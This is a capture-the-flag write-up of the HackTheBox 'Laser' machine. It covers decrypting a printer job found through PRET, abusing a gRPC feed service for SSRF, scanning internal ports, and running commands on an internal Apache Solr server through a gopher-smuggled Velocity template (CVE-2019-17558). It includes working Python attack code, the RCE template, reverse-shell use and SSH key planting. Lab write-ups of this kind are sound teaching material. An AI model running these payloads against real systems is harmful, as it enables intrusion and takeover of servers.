HackTheBox Laser Writeup – 10.10.10.201

Hello friends, I'm back with another HackTheBox writeup. This time it is the Laser (10.10.10.201) box, whose difficulty is categorized as "Insane". It is the second hardest box I've solved, after Unbalanced. My Unbalanced writeup was supposed to go online this week, but due to its length and a few other issues I've postponed it and started working on Laser.

HackTheBox Laser – 10.10.10.201

From the name of the machine, "Laser", one can guess that it involves a printer exploit. The initial scan reveals only 3 open ports, which makes the attack surface very narrow: port 22 is common SSH, and the other two are 9000 (unknown) and 9100, the printer port.

So, let’s get started.

Enumeration

As always, the machine IP goes to the hosts file as laser.htb and I start the nmap scan.

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9000/tcp open  cslistener?
9100/tcp open  jetdirect?
1 service unrecognized despite returning data. 

The nmap scan reveals that ports 22, 9000 and 9100 are open. Port 22 is SSH, and port 9100 is used for raw data transfer from host to printer, commonly by HP and Epson devices. Port 9000 hosts a service nmap labels "cslistener"; I have no further information about it.

PRinter Exploitation Toolkit (PRET)

Looking for exploits, I found a couple of articles that showcase ways of exploiting network printers.

PRET bridges the communication between the end user and the printer. Commands typed into the PRET shell are translated to PostScript, PJL or PCL and sent to the printer. When the printer responds, PRET evaluates the result and translates it back into a user-friendly format.
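To get a feel for that translation: when PRET probes a device's identity, roughly the following PJL goes over the wire to port 9100 (a simplified illustration, not a capture from this box):

@PJL INFO ID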

PRET needs to be installed with a number of prerequisites.

  • sudo pip install colorama pysnmp
  • pip install win_unicode_console
  • sudo apt install imagemagick ghostscript

Installing PRET:

  • sudo git clone https://github.com/RUB-NDS/PRET.git

Playing with PRET:

After installing PRET I started figuring out how it works. The PRET directory contains several Python scripts; I started with pret.py. Of the three supported languages (PS, PCL and PJL), the target only accepted PJL. PJL, the Printer Job Language, is used to exchange job-level instructions between the host and the printer.

The usage: pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}

root@nav1n:~/htb/laser/PRET(master○) # python pret.py laser.htb pjl   
      ________________                                             
    _/_______________/|                                            
   /___________/___//||   PRET | Printer Exploitation Toolkit v0.40
  |===        |----| ||    by Jens Mueller <jens.a.mueller@rub.de> 
  |           |   ô| ||                                            
  |___________|   ô| ||                                            
  | ||/.´---.||    | ||      「 pentesting tool that made          
  |-||/_____\||-.  | |´         dumpster diving obsolete‥ 」       
  |_||=L==H==||_|__|/                                              
                                                                   
     (ASCII art by                                                 
     Jan Foerster)                                                 
                                                                   
Connection to laser.htb established
Device:   LaserCorp LaserJet 4ML

Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> ?

Available commands (type help <topic>):
=======================================
append  delete    edit    free  info    mkdir      printenv  set        unlock 
cat     destroy   env     fuzz  load    nvram      put       site       version
cd      df        exit    get   lock    offline    pwd       status   
chvol   disable   find    help  loop    open       reset     timeout  
close   discover  flood   hold  ls      pagecount  restart   touch    
debug   display   format  id    mirror  print      selftest  traversal

laser.htb:/> 

The printer has its own directory called "jobs" where queued jobs are stored. This can be accessed using the ls command.

Connection to laser.htb established
Device:   LaserCorp LaserJet 4ML

Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> ls ../../
PJL Error: Volume not available
laser.htb:/> ls
d        -   pjl
laser.htb:/> cd d
PJL Error: Volume not available
Failed to change directory.
laser.htb:/> cd pjl
laser.htb:/pjl> ls
d        -   jobs
laser.htb:/pjl> cd jobs
laser.htb:/pjl/jobs> ls
-   172199   queued
laser.htb:/pjl/jobs> cd queued
Failed to change directory.
laser.htb:/pjl/jobs> cat queued
b'VfgBAAAAAADOiDS0d+nn3sdU24Myj/njDqp6+zamr0JMcj84pLvGcvxF5IEZAbjjAHnfef9tCBj4u+wj/uGE1BLmL3Mtp/YL+wiVXD5MKKmdevvEhIONVNBQv26yTwdZFPYrcPTC9BXqk/vwzfR3BWoDRajzyLWcah8TOugtXl0ndmVwYajU0LvStgspvXIGsjl8VWFRi/kQJr+YsAb2lQu+Kt2LCuyooPLKN3EO/puvAOSdICSoi7RKfzg937j7Evcc0x5a3YAIes/j5rGroQuOrWwPlmbC5cvnpqkgBmZCuHCGMqBGRtDOt3vLQ/tI9+u99/0Ss6sIpOladA5aFQd..........

Upon cat-ing it, I noticed queued is some sort of encrypted file, so I decided to download it to my local machine and analyze it. Looking at the file through hexdump, I found the content is base64-encoded.

root@nav1n:~/htb/laser/PRET(master) # hexdump -vC queued
00000000  62 27 56 66 67 42 41 41  41 41 41 41 44 4f 69 44  |b'VfgBAAAAAADOiD|
00000010  53 30 64 2b 6e 6e 33 73  64 55 32 34 4d 79 6a 2f  |S0d+nn3sdU24Myj/|
00000020  6e 6a 44 71 70 36 2b 7a  61 6d 72 30 4a 4d 63 6a  |njDqp6+zamr0JMcj|
00000030  38 34 70 4c 76 47 63 76  78 46 35 49 45 5a 41 62  |84pLvGcvxF5IEZAb|
00000040  6a 6a 41 48 6e 66 65 66  39 74 43 42 6a 34 75 2b  |jjAHnfef9tCBj4u+|
00000050  77 6a 2f 75 47 45 31 42  4c 6d 4c 33 4d 74 70 2f  |wj/uGE1BLmL3Mtp/|
00000060  59 4c 2b 77 69 56 58 44  35 4d 4b 4b 6d 64 65 76  |YL+wiVXD5MKKmdev|
00000070  76 45 68 49 4f 4e 56 4e  42 51 76 32 36 79 54 77  |vEhIONVNBQv26yTw|
00000080  64 5a 46 50 59 72 63 50  54 43 39 42 58 71 6b 2f  |dZFPYrcPTC9BXqk/|
00000090  76 77 7a 66 52 33 42 57  6f 44 52 61 6a 7a 79 4c  |vwzfR3BWoDRajzyL|
000000a0  57 63 61 68 38 54 4f 75  67 74 58 6c 30 6e 64 6d  |Wcah8TOugtXl0ndm|

There is a get command which I saw in the help; I used it to download the queued file.

Going further, I decided to enumerate the printer itself using PRET by trying the available commands, starting with nvram. As per the documentation, the nvram command dumps all NVRAM to a local file. So I ran it.

laser.htb:/> nvram
NVRAM operations:  nvram <operation>
  nvram dump [all]         - Dump (all) NVRAM to local file.
  nvram read addr          - Read single byte from address.
  nvram write addr value   - Write single byte to address.
laser.htb:/> nvram dump
Writing copy to nvram/laser.htb
..........................................................................................................k...e....y.....13vu94r6..643rv19u
laser.htb:/> 

The file was dumped as nvram/laser.htb, and buried in the padding there was something labelled "key": 13vu94r6643rv19u. I had no idea what it was for, but I believed it to be the key or passphrase to decode the queued file, or something along those lines. So let's find out.

I base64-decoded the queued dump to recover the raw file, and from its hexdump I obtained the first 8 bytes: 55 f8 01 00 00 00 00 00 -> 55f8010000000000.

The idea is to decrypt the raw file. After discussing with a friend, we concluded that, since the encryption used is AES-128 (block size 128 bits, i.e. 16 bytes), the extra bytes in front of the ciphertext must be dropped: the first 8 bytes appear to be a packed length header, and everything after them is the encrypted package, i.e. [8-byte header][16-byte IV][ciphertext].

Using the Python struct module, the header can be stripped and the file unpacked. Here is the unpacked hex:

root@nav1n:~/htb/laser/PRET(master) # hexdump queued.unpacked -n 100 
0000000 88ce b434 e977 dee7 54c7 83db 8f32 e3f9
0000010 aa0e fb7a a636 42af 724c 383f bba4 72c6
0000020 45fc 81e4 0119 e3b8 7900 79df 6dff 1808
0000030 bbf8 23ec e1fe d484 e612 732f a72d 0bf6
0000040 08fb 5c95 4c3e a928 7a9d c4fb 8384 548d
0000050 50d0 6ebf 4fb2 5907 f614 702b c2f4 15f4
0000060 93ea f0fb                              
0000064
root@nav1n:~/htb/laser/PRET(master) # 

The hexdump above prints 16-bit words, so the byte order is swapped. Reading the raw bytes with xxd and taking the first 16, I finally have the IV: ce8834b477e9e7dec754db83328ff9e3

root@nav1n:~/htb/laser/PRET(master) # xxd -l 16 queued.unpacked 
00000000: ce88 34b4 77e9 e7de c754 db83 328f f9e3  ..4.w....T..2...
root@nav1n:~/htb/laser/PRET(master) # 
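For reference, here is a minimal Python sketch of that unpacking step. I'm assuming the dump is a Python bytes literal of base64 text, and that the 8-byte header is a little-endian unsigned long long, which matches the 55 f8 01 00 00 00 00 00 prefix:

#!/usr/bin/env python3
# unpack.py - strip the 8-byte header from the queued dump (a sketch)
import base64, struct

text = open('queued').read().strip()
if text.startswith("b'") and text.endswith("'"):
    text = text[2:-1]                        # drop the bytes-literal quoting
raw = base64.b64decode(text)

(length,) = struct.unpack('<Q', raw[:8])     # 55 f8 01 00 ... -> 0x1f855 = 129109
print('declared payload length:', length)

open('queued.unpacked', 'wb').write(raw[8:]) # IV + ciphertext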

Decrypting The Queue File

As I now have everything, I proceeded to decrypt the queued file downloaded from the printer's jobs directory.

IV: ce8834b477e9e7dec754db83328ff9e3, key: 13vu94r6643rv19u

The easiest way to decrypt an AES-encrypted file is OpenSSL; however, I ran into an error while decrypting.

root@nav1n:~/htb/laser/PRET(master) # openssl aes-128-cbc -d -nopad -iv ce8834b477e9e7dec754db83328ff9e3 -K 13vu94r6.643rv19u -in queued.raw3 -out queued.decrypted3
hex string is too short, padding with zero bytes to length
non-hex digit
invalid hex key value

This error suggests the key (13vu94r6643rv19u) should be in hex format, so let us convert the key to hex:

root@nav1n:~/htb/laser/PRET(master) # echo -n 13vu94r6643rv19u | xxd
00000000: 3133 7675 3934 7236 3634 3372 7631 3975  13vu94r6643rv19u
root@nav1n:~/htb/laser/PRET(master) #

HEX VALUE: 31337675393472363634337276313975
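The same conversion in one line of Python, for the record:

python3 -c "print('13vu94r6643rv19u'.encode().hex())"   # 31337675393472363634337276313975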

root@nav1n:~/htb/laser # openssl aes-128-cbc -d -nopad -iv ce8834b477e9e7dec754db83328ff9e3 -K 31337675393472363634337276313975 -in queued.unpacked -out queued.decrypted 
root@nav1n:~/htb/laser # ls
laser.nmap.gnmap  laser.nmap.nmap  laser.nmap.xml  PRET  queued.decrypted  queued.unpacked
root@nav1n:~/htb/laser # 

The file was successfully decrypted as queued.decrypted. Checking the file type, it turned out to be a PDF.

The PDF file:

The PDF is documentation for an application called "Feed Engine v1.0". Reading it, it became clear that port 9000 is used by this service, and there is a section that shows how to use it. Further reading reveals a new domain name, laserinternal.htb, in the sample feed information. I immediately added the newly found domain to my hosts file.

The domain is not accessible directly from the URL, but using the port:9000 I was able to access, but looks like an application or encrypted data.

Going back to the PDF, there is a mention of "Protocol Buffers and gRPC framework". A quick Google search led to the gRPC website as a top result. Going through the articles there, I understood that gRPC is an open-source, universal RPC framework that supports several languages: Python, C++, PHP, Node, Ruby, Go, Dart, etc.

We are still unsure which language the Laser machine uses as the backend for the gRPC framework, but a little guesswork from the PDF file, where terms like "builtins" and "unpickled" appear, hints towards Python. So, for a better understanding of the gRPC framework, I started reading up on the gRPC Python protocol.

What I understood was this: gRPC Python relies on the protocol buffers compiler (protoc) to generate code. For a .proto service description containing gRPC services, the plain protoc-generated code is synthesized in a _pb2.py file, and the gRPC-specific code lands in a _pb2_grpc.py file; the latter Python module imports the former.

Also, the PDF mentions a return type, service_pb2.Data. A quick Google search took me to the Google Developers page where the term is used. Digging further, I found several useful articles and code samples on Google Developers, semantics3.com and GitHub.

As per the PDF file: "We defined a Print service which has an RPC method called Feed. This method takes Content as input parameter and returns Data from the server." So we can get data back from the server over RPC, and the Content is for us to define. However, the feed data is expected only in JSON format, and the serialization underneath uses Python's pickle module, which I was not able to exploit directly.
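Reading between the lines, the server presumably handles each request roughly like this. To be clear, this is my speculation to frame the attack surface, not the box's actual code:

# speculative reconstruction of the server-side Feed handler
import base64, json, pickle

def feed_handler(data_field):
    payload = pickle.loads(base64.b64decode(data_field))  # the "unpickled" step from the PDF
    params = json.loads(payload)                          # feed parameters arrive as JSON
    return params.get('feed_url')                         # fetched server-side: an SSRF primitive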

Creating A Protocol Buffer File

After going through a load of documentation, I decided to move on with the limited knowledge I had gained so far. To communicate with the server and get a message back as described in the PDF, I need a protocol buffers setup on my Kali machine. Referring to the Google documentation and the Wikipedia page, I made one for myself.

Example:

//polyline.proto
syntax = "proto2";

message Point {
  required int32 x = 1;
  required int32 y = 2;
  optional string label = 3;
}

message Line {
  required Point start = 1;
  required Point end = 2;
  optional string label = 3;
}

message Polyline {
  repeated Point point = 1;
  optional string label = 2;
}

I made my own protobuf file, laser.proto, with the following definitions. Note that the Print service and its Feed method have to be declared here as well; without the service block, protoc would not generate the stub code shown later.

//laser.proto
syntax = "proto3";
message Content {
        string data = 1;
}
message Data {
        string feed = 1;
}
service Print {
        rpc Feed (Content) returns (Data) {}
}

Generate gRPC classes for Python

To generate the gRPC classes, two packages need to be preinstalled, grpcio and grpcio-tools; I used pip to install both.

After installing the tools, I ran the command below, which generated two more Python files: laser_pb2.py and laser_pb2_grpc.py.

python2 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto
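A quick sanity check that the generated modules import cleanly (run from the same directory):

python3 -c "import laser_pb2, laser_pb2_grpc; print(laser_pb2.Content, laser_pb2_grpc.PrintStub)"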

laser_pb2.py

root@nav1n:~/htb/laser # cat laser_pb2.py 
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: laser.proto

from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
  name='laser.proto',
  package='',
  syntax='proto3',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\x0blaser.proto\"\x17\n\x07\x43ontent\x12\x0c\n\x04\x64\x61ta\x18\x01 \x01(\t\"\x14\n\x04\x44\x61ta\x12\x0c\n\x04\x66\x65\x65\x64\x18\x01 \x01(\t2\"\n\x05Print\x12\x19\n\x04\x46\x65\x65\x64\x12\x08.Content\x1a\x05.Data\"\x00\x62\x06proto3'
)
_CONTENT = _descriptor.Descriptor(
  name='Content',
  full_name='Content',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='data', full_name='Content.data', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=15,
  serialized_end=38,
)

_DATA = _descriptor.Descriptor(
  name='Data',
  full_name='Data',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='feed', full_name='Data.feed', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=40,
  serialized_end=60,
)
DESCRIPTOR.message_types_by_name['Content'] = _CONTENT
DESCRIPTOR.message_types_by_name['Data'] = _DATA
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

Content = _reflection.GeneratedProtocolMessageType('Content', (_message.Message,), {
  'DESCRIPTOR' : _CONTENT,
  '__module__' : 'laser_pb2'
  # @@protoc_insertion_point(class_scope:Content)
  })
_sym_db.RegisterMessage(Content)

Data = _reflection.GeneratedProtocolMessageType('Data', (_message.Message,), {
  'DESCRIPTOR' : _DATA,
  '__module__' : 'laser_pb2'
  # @@protoc_insertion_point(class_scope:Data)
  })
_sym_db.RegisterMessage(Data)
_PRINT = _descriptor.ServiceDescriptor(
  name='Print',
  full_name='Print',
  file=DESCRIPTOR,
  index=0,
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_start=62,
  serialized_end=96,
  methods=[
  _descriptor.MethodDescriptor(
    name='Feed',
    full_name='Print.Feed',
    index=0,
    containing_service=None,
    input_type=_CONTENT,
    output_type=_DATA,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
])
_sym_db.RegisterServiceDescriptor(_PRINT)

DESCRIPTOR.services_by_name['Print'] = _PRINT

# @@protoc_insertion_point(module_scope)
root@nav1n:~/htb/laser # 

laser_pb2_grpc.py

root@nav1n:~/htb/laser # cat laser_pb2_grpc.py 
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc

import laser_pb2 as laser__pb2


class PrintStub(object):
    """Missing associated documentation comment in .proto file."""

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.Feed = channel.unary_unary(
                '/Print/Feed',
                request_serializer=laser__pb2.Content.SerializeToString,
                response_deserializer=laser__pb2.Data.FromString,
                )


class PrintServicer(object):
    """Missing associated documentation comment in .proto file."""

    def Feed(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_PrintServicer_to_server(servicer, server):
    rpc_method_handlers = {
            'Feed': grpc.unary_unary_rpc_method_handler(
                    servicer.Feed,
                    request_deserializer=laser__pb2.Content.FromString,
                    response_serializer=laser__pb2.Data.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'Print', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


 # This class is part of an EXPERIMENTAL API.
class Print(object):
    """Missing associated documentation comment in .proto file."""

    @staticmethod
    def Feed(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Print/Feed',
            laser__pb2.Content.SerializeToString,
            laser__pb2.Data.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
root@nav1n:~/htb/laser # 

Getting The Reverse Shell

Now it's time to connect to the server and get a response; if I can communicate in any manner, I can move forward, or else I just need to spend more time reading about gRPC. After several tries, I was able to get a reverse connection (I call it a reverse ping back) from the machine.

The reverse.py – gRPC client sample script references:

https://gist.githubusercontent.com/ramananbalakrishnan/19e0952b61f51be8e71b8e4fcaa738e8/raw/a1c5d62033d9250b8d4cc8d425f5518727d40ad0/client.py

https://stackoverflow.com/questions/57477505/does-grpc-with-no-encryption-or-authenticationinsecurechannel-works-between-2

#!/usr/bin/env python3
import grpc, sys

# import the generated classes
import laser_pb2, laser_pb2_grpc

# import the pickle and base64 modules
import pickle, base64

# open a gRPC channel to the Feed service
ch = grpc.insecure_channel('10.10.10.201:9000')

# create a stub (client)
stub = laser_pb2_grpc.PrintStub(ch)

# payload: pickle the first CLI argument and base64-encode it,
# matching the format the service expects
pl = base64.b64encode(pickle.dumps(sys.argv[1]))

# wrap the payload in a Content message and call Feed
content = laser_pb2.Content(data=pl)
try:
        response = stub.Feed(content)
        print(response)
except Exception as ex:
        print(ex)

Once the gRPC client is ready, I start a listener in another terminal and execute my script with the arguments given as per the PDF:
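For example, with a listener in one terminal (port 9001 is just the one I picked; the JSON follows the PDF's sample feed format):

root@nav1n:~/htb/laser # nc -lvnp 9001

root@nav1n:~/htb/laser # python3 reverse.py '{"feed_url":"http://10.10.14.21:9001/"}'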

And I have a connection back on my listener. I cannot run any commands, which is understandable, but I am now able to communicate with the server using my gRPC client, which accepts my external input as a feed.

Despite getting the reverse connection, I was not able to proceed further; I tried different exploitation methods but nothing worked. Looking desperately for help, one of the HTB users pointed me towards the services running on the target machine.

The machine does not reveal anything to external scanners beyond ports 22, 9000 and 9100, so any further scanning has to target internal ports and services. Other than the gRPC client, I don't think anything else would work, so I decided to modify the gRPC client into a port scanner.

Final Port scanner script:

Referring to this article, I amended a couple of lines in reverse.py and made the following script, which scans localhost on the target for internally listening ports and services: the loop sends each port to the Feed service and reports the ones that answer.

#!/usr/bin/env python3
import grpc
import pyfiglet
# import the generated classes
import laser_pb2, laser_pb2_grpc
# import the pickle and base64 modules
import pickle, base64
from datetime import datetime

# banner
ascii_banner = pyfiglet.figlet_format("PORT SCANNER")
print(ascii_banner)
print("\n + nav1n !!!!")
print("-" * 50)
print("Scanning started at: " + str(datetime.now()))
print("-" * 50)

# open a gRPC channel and create a stub (client)
ch = grpc.insecure_channel('10.10.10.201:9000')
stub = laser_pb2_grpc.PrintStub(ch)

for port in range(1, 65536):
    # payload: ask the Feed service to fetch each local port in turn
    pl = '{"feed_url":"http://localhost:' + str(port) + '"}'
    content = laser_pb2.Content(data=base64.b64encode(pickle.dumps(pl)))
    try:
        # heuristic: a normal Feed response means something answered on the
        # port; connection errors and timeouts are treated as closed
        response = stub.Feed(content, timeout=3)
        print("[+] port {} looks open".format(port))
    except Exception:
        pass

Running the scanner for about 30 minutes, I got the following result: along with ports 22, 9000 and 9100, I now have two new open, listening ports, 7983 and 8983.

Port 8983 – Apache Solr

Of the two, port 7983 yields nothing valuable, but port 8983 is the default port of Apache Solr: https://lucene.apache.org/solr/guide/6_6/running-solr.html

This suggests Apache Solr is running locally on the machine. Apache Solr is an enterprise search platform built on Apache Lucene. It's hard to confirm whether this Solr instance is vulnerable, as I'm not able to connect to it externally.

Looking for exploits, I found Apache Solr 8.2.0 - Remote Code Execution in Exploit-DB, tracked as CVE-2019-17558. After testing for a while, I found this exploit does not work out of the box, as it needs direct access to the machine and the port. In my case, I can only reach the Solr port through the gRPC client, since the service listens locally.

Velocity RCE Template:

So what I need is a script based on that PoC, but one that reaches the machine through the gRPC feed instead. Working with a couple of Discord buddies, we finally made a script that works.

I'll break the script up so it's easy to understand:

def feed(url):
        # wrap the target URL in the JSON the Feed service expects,
        # then pickle + base64 it, exactly like the client above
        mp = '{"feed_url":"' + url.replace('"', '\\"') + '"}'
        p = base64.b64encode(pickle.dumps(mp))
        try:
                import grpc
                service_pb2 = proto2_pb2
                service_pb2_grpc = proto2_pb2_grpc
                print(mp)
                channel = grpc.insecure_channel(grpc_addr)
                stub = proto2_pb2_grpc.PrintStub(channel)
                content = proto2_pb2.Content(data=p)
                try:
                        response = stub.Feed(content, timeout=5)
                        print(response)
                        return
                except Exception as ex:
                        print(ex)
        except:
                # fallback: if the grpc module is not available, shell out to grpcurl
                import subprocess
                cmd = '/bin/grpcurl -max-time 5 -plaintext -proto service.proto -d \'{"data":"' + p.decode() + '"}\' ' + grpc_addr + ' Print.Feed'
                print(cmd)
                out = subprocess.call(cmd, shell=True)

def gopher(addr, req):
        # smuggle a raw request to an internal host:port through a gopher:// feed
        # URL; newlines become %0d%0a so the fetcher replays them as CRLFs
        feed('gopher://{0}/_{1}'.format(addr, req).replace('%', '%25').replace('\n', '%0d%0a'))

def post_data(addr, headers, mp):
        # build a raw HTTP POST (with correct Content-Length) and smuggle it
        gopher(addr, '{0}\nContent-Length: {1}\n\n{2}'.format(headers.strip(), len(mp), mp))

def get_data(addr, headers, query):
        # build a raw HTTP GET and smuggle it
        gopher(addr, 'GET {0} HTTP/1.1\n{1}\n'.format(query.replace(' ', '%20'), headers.strip()))
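To see what these helpers actually emit, here is a toy trace of the gopher wrapping (same escaping as the functions above):

# toy demonstration of the gopher smuggling used above
def gopher_url(addr, req):
    return 'gopher://{0}/_{1}'.format(addr, req).replace('%', '%25').replace('\n', '%0d%0a')

req = 'GET /solr/admin/cores HTTP/1.1\nHost: localhost:8983\n'
print(gopher_url('localhost:8983', req))
# -> gopher://localhost:8983/_GET /solr/admin/cores HTTP/1.1%0d%0aHost: localhost:8983%0d%0a
# the feed fetcher connects to localhost:8983 and replays everything after the "_"
# as raw bytes, i.e. a complete HTTP request hits the internal Solr port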

The config-update request (header and JSON body) that enables the Velocity response writer:

headers = """
POST /solr/test/config HTTP/1.1
Host: localhost:8983
Content-Type: application/json
""".strip().replace('/solr/test/', '/solr/' + solr_core + '/')

mp = """
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}""".strip().replace('\n', '').replace(' ', '')

The Velocity RCE template was adapted from this article: https://anemone.top/vulnresearch-Solr_Velocity_injection/

The template part of the script, which runs the command and prints its output:

headers = "Host: localhost:8983"
template = """
#set($x='') 
#set($rt=$x.class.forName('java.lang.Runtime')) 
#set($chr=$x.class.forName('java.lang.Character')) 
#set($str=$x.class.forName('java.lang.String')) 
#set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor() 
#set($out=$ex.getInputStream()) 
#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
""".strip().replace('\n', '+').replace('#', '%23').replace('<CMD>', cmd)
query = '/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=' + template
query = query.replace('/solr/test/', '/solr/' + solr_core + '/')
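Tying it together, the exploit is just two smuggled requests: a POST to enable the Velocity response writer, then a GET that renders the template. A sketch of the final glue, assuming the snippets above are in scope; grpc_addr, solr_core and cmd are values I'm filling in for illustration (the real core name has to be enumerated first, e.g. via /solr/admin/cores):

grpc_addr = '10.10.10.201:9000'   # the Feed service we tunnel through
solr_core = 'CORE_NAME'           # placeholder: the discovered core name
cmd = 'id'                        # or a bash reverse-shell one-liner
# note: cmd and solr_core must be set before the headers/mp/template/query
# snippets above are evaluated, since they bake these values in

post_data('localhost:8983', headers, mp)                    # enable VelocityResponseWriter
get_data('localhost:8983', 'Host: localhost:8983', query)   # render template -> RCE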

User.txt

Running the script, I got a reverse shell as the solr user on my listener. The user flag was found in /home/solr/.

Getting Better Shell As SSH

I upgraded the shell to a full TTY by running python -c 'import pty; pty.spawn("/bin/bash")'.

As the solr user can read and write its own .ssh directory, I generated an ED25519 SSH key pair and added the public key to solr's authorized_keys.

root@nav1n:~/htb/laser # ssh-keygen -t ed25519 -C "nav1n" -P ""
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): 
/root/.ssh/id_ed25519 already exists.
Overwrite (y/n)? y
Your identification has been saved in /root/.ssh/id_ed25519.
Your public key has been saved in /root/.ssh/id_ed25519.pub.
The key fingerprint is:
SHA256:6ob*********8gO3qw nav1n
The key's randomart image is:
+--[ED25519 256]--+
|==o.**  .+.      |
|oX=+o++o+.o      |
|=.@.o.+o.o .     |
| o *  .+..       |
|  .   ..S        |
| E    .+ o       |
|     +..o        |
|    ..+ .        |
|     ...         |
+----[SHA256]-----+
root@nav1n:~/htb/laser # 

And SSH as Solr:

root@nav1n:~/htb/laser # ssh solr@10.10.10.201
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Aug 2020 01:53:59 PM UTC

  System load:                      0.05
  Usage of /:                       44.7% of 19.56GB
  Memory usage:                     51%
  Swap usage:                       0%
  Processes:                        232
  Users logged in:                  0
  IPv4 address for br-3ae8661b394c: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.201
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:1961

 * Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
   sudo snap install microk8s --channel=1.19/candidate --classic

   https://www.microk8s.io/ has docs and details.

73 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug  4 07:01:35 2020 from 10.10.14.3
solr@laser:~$ 

PSpy

After some research and a few coffees, I decided to run pspy to watch cron jobs and processes, as they might offer some leads. I downloaded pspy from DominicBreuker's repo and used wget to pull it onto the box.

solr@laser:~$ wget http://10.10.14.21:8000/pspy64s
--2020-08-23 13:58:58--  http://10.10.14.21:8000/pspy64s
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’
pspy64s                       100%[=======================================================>]   1.10M   307KB/s    in 3.7s    
2020-08-23 13:59:01 (307 KB/s) - ‘pspy64s’ saved [1156536/1156536]
solr@laser:~$
solr@laser:~$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/08/23 14:10:37 CMD: UID=0    PID=959    | /lib/systemd/systemd-logind 
2020/08/23 14:10:37 CMD: UID=0    PID=957    | /usr/lib/snapd/snapd 
2020/08/23 14:10:37 CMD: UID=104  PID=956    | /usr/sbin/rsyslogd -n -iNONE 
